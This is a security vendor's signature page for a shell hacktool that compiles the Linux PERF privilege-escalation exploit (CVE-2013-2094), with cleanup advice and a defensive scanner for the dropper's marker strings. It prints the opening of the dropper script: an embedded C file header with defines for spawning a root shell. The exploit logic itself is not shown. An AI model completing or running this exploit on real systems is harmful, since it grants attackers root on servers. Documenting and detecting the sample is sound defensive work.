Malware Signatures

sh.hacktool.abacus-exploit.001

Hacktools are specially crafted tools used to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and brute-forcing passwords. These tools are usually hidden in the filesystem and are installed along with other malicious code through a vulnerability or on an already compromised server.
This tool compiles and executes the abacus-exploit, also known as the Linux PERF privilege escalation exploit (CVE-2013-2094).

Affecting

Any vulnerable website hosted on a server with shell support (mostly Linux boxes). Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server for any unknown shell script files and remove them. You can also sign up with us and let our team remove the malware for you.
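
One way to carry out the inspection described above, as an added example (not part of the original signature entry or of the vendor's scanner): a shell function that walks a directory and flags shell scripts containing strings visible in the dump below, with a weaker heuristic for any script that writes a C source file from a here-document. The function names and the MATCH/REVIEW labels are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: locate shell scripts that match this signature's dropper pattern.
# MARKERS holds strings copied from the dump on this page; extend it as needed.
MARKERS='exp_abacus\.c|STRAIGHT_UP_EXECUTION_AT_NULL|EXIT_KERNEL_TO_NULL|FUNNY_PIC_AND_ROOTSHELL'

# is_shell_script FILE: true when the first line is a shell shebang.
is_shell_script() {
    head -n 1 "$1" 2>/dev/null |
        grep -Eq '^#![[:space:]]*/(usr/)?bin/(env[[:space:]]+)?(ba|da|k)?sh'
}

# writes_c_heredoc FILE: true when the script writes a .c file from a
# here-document, the same shape as "cat > exp_abacus.c <<_EOF" in the dump.
writes_c_heredoc() {
    grep -Eq 'cat[[:space:]]*>[[:space:]]*[^[:space:]]+\.c[[:space:]]*<<' "$1"
}

# scan_abacus_droppers DIR: print one line per suspicious shell script.
#   MATCH  path  -> contains a marker string from this signature
#   REVIEW path  -> embeds C source in a here-document (heuristic; legitimate
#                   build scripts can do this, so inspect before removing)
# Files under 1 MiB only; paths containing newlines are not handled.
scan_abacus_droppers() {
    dir=${1:-.}
    find "$dir" -xdev -type f -size -1024k 2>/dev/null |
    while IFS= read -r f; do
        is_shell_script "$f" || continue
        if grep -Eq "$MARKERS" "$f"; then
            echo "MATCH $f"
        elif writes_c_heredoc "$f"; then
            echo "REVIEW $f"
        fi
    done
}

# Typical call, with the web root as an assumed path:
#   scan_abacus_droppers /var/www
```

Renamed or re-encoded copies will not contain these marker strings, so treat an empty result as "nothing found by this check" rather than proof the server is clean.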

Dump

#!/bin/sh
# original exploit by sd@fucksheep.org, written in 2010
# heavily modified by spender to do things and stuff
# edited by Pashkela for RDOT.ORG 02.06.2013
cat > exp_abacus.c <<_EOF
/*
 * original exploit by sd@fucksheep.org, written in 2010
 * heavily modified by spender to do things and stuff
 */
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <sys/utsname.h>
#include <fcntl.h>
#include <assert.h>
#define BIT64   (sizeof(unsigned long) != sizeof(unsigned int))
#define STRAIGHT_UP_EXECUTION_AT_NULL 0x31337
 /* for overflows */
#define EXIT_KERNEL_TO_NULL 0x31336
#define EXECUTE_AT_NONZERO_OFFSET 0xfffff000 // OR the offset with this
/* defines for post_exploit */
#define RUN_ROOTSHELL 0x5150
#define CHMOD_SHELL 0x5151
#define FUNNY_PIC_AND_ROOTSHELL 0xdeadc01d